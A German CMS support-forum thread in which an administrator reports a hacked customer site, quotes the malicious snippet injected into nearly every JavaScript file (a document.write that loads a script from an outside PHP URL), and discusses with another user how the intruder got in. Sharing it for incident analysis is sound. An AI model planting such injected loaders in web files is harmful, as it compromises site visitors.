Formular Assistant (Kontakt usw.)

Fragen zur Installation von CONTENIDO 4.9? Probleme bei der Konfiguration? Hinweise oder Fragen zur Entwicklung des Systemes oder zur Sicherheit?
Antworten
Faar
Beiträge: 1915
Registriert: Sa 8. Sep 2007, 16:23
Wohnort: Brandenburg
Kontaktdaten:

Formular Assistant (Kontakt usw.)

Beitrag von Faar » Fr 21. Mär 2014, 11:00

Ich habe gestern den Formular-Assistenten benützt und ein Kontakformular in die Kontaktseite eingebaut und siehe da, es tut sich in zeitlichem Zusammenhang was: http://chameleon-media(dot)de/YX7N9QF3.php (Dem Link bitte nicht unbedarft folgen)
Dank meines Requestblockers ging da nichts raus, aber ich frage mich, wie ich zu diesem Link komme?
Im HTML-Seitenquelltext findet sich nämlich nichts, aber sowohl im Backend im Editmodus als auch im Frontend erscheint dieser Request, als ob er vom PHP-Programm aus gestartet wird.
Das war vor dem Einbau eines Kontakformulars über den Form Assistant nicht gewesen, daher besteht ein zumindest zeitlicher Zusammenhang.

Was aber nichts bedeuten muss, denn diese Seite war schon einmal gehackt und alle Javascript Dateien waren befallen.
Nun auch diesesmal das Gleiche in nahezu jeder .js Datei:

Code: Alles auswählen

/*697bf7*/
/**/





document.write("<script type='text/javascript' src='http://chameleon-media.de/YX7N9QF3.php'></"+ "script>");






/*/697bf7*/
Da ich das System und die Datenbank das letzte Mal sauber gemacht hatte und außer dem Kontakformular nichts neues dazu kam, könnte es auch über den Hoster gekommen sein, bzw. dem Kunden-Account.
Ich möchte hier nur ausschließen, dass über Contenido irgendwas hereingekommen sein könnte.
Denn dann kann es fast nur noch am Kunden-PC oder eben am Hoster (Account) liegen.

...dank dem lieben Datenschutz habe ich keinen Zugriff aufs Serverlogfile, kann also nicht sagen, wer wann und von wo aus auf den Account zugegriffen hat. :evil:
Fliegt der Bauer übers Dach, ist der Wind weißgott nicht schwach.

Oldperl
Beiträge: 4250
Registriert: Do 30. Jun 2005, 22:56
Wohnort: Eltmann, Unterfranken, Bayern
Kontaktdaten:

Re: Formular Assistant (Kontakt usw.)

Beitrag von Oldperl » Fr 21. Mär 2014, 17:01

Wurden beim letzten Mal auch sämtliche Zugänge neu gesichert/geändert. Hatte so einen Fall schon mal durch einen Trojaner auf nem Kundenrechner der die benutzen Passwörter weiter gab.

Gruß aus Franken

Ortwin
ConLite 2.1, alternatives und stabiles Update von Contenido 4.8.x unter PHP 7.x - Download und Repo auf Gitport.de
phpBO Search Advanced - das Suchwort-Plugin für CONTENIDO 4.9
Mein Entwickler-Blog

Faar
Beiträge: 1915
Registriert: Sa 8. Sep 2007, 16:23
Wohnort: Brandenburg
Kontaktdaten:

Re: Formular Assistant (Kontakt usw.)

Beitrag von Faar » Fr 21. Mär 2014, 17:32

Hallo Ortwin,

nein, habe ich nicht, weil ich davon ausging, dass der Hacker über das damals installierte und unsichere System herein kam.
Das alte System ist gelöscht und nun kam der Hacker trotzdem wieder rein.
Ich glaube nun auch nicht, dass es über ein Script im Formularassistenten kam, das war wohl nur ein zeitlicher Zufall.
Damit schließe ich Contenido zu 99,9% aus Ursache aus (aber sicher gehen wollte ich trotzdem).

Unsere Rechner sind abgesichert, alle anderen Installationen sind sauber, es betrifft also immer nur diese eine Kundeninstallation.
Den Domainhaber habe ich informiert, dass sich bei ihm was seltsames auf dem Server befinden muss und mit dem Hoster hatte ich auch telefoniert.
Zugangsdaten sind nun geändert worden, auch Datenbank und Kunden-Account beim Hoster.
Es kann natürlich sein, dass sich ein Keylogger auf dem Kunden-PC befindet, aber dieser meinte schon letztesmal, dass er es geprüft hätte und der PC sei sauber gewesen.
Ich vermute, es war ein weiterer FTP-Zugang, der frühe einmal von meinem Vorgänger benutzt wurde.
Aber da ich die Logfiles nicht sehen kann, weiß ich nichts.
Allerdings konnte man beim Hoster das Loggen alle Schreibzugriffe auf den Server einstellen, jetzt bekomme ich jeden Tag Email ...auch natürlich über Caching vom CMS.
Fliegt der Bauer übers Dach, ist der Wind weißgott nicht schwach.

Antworten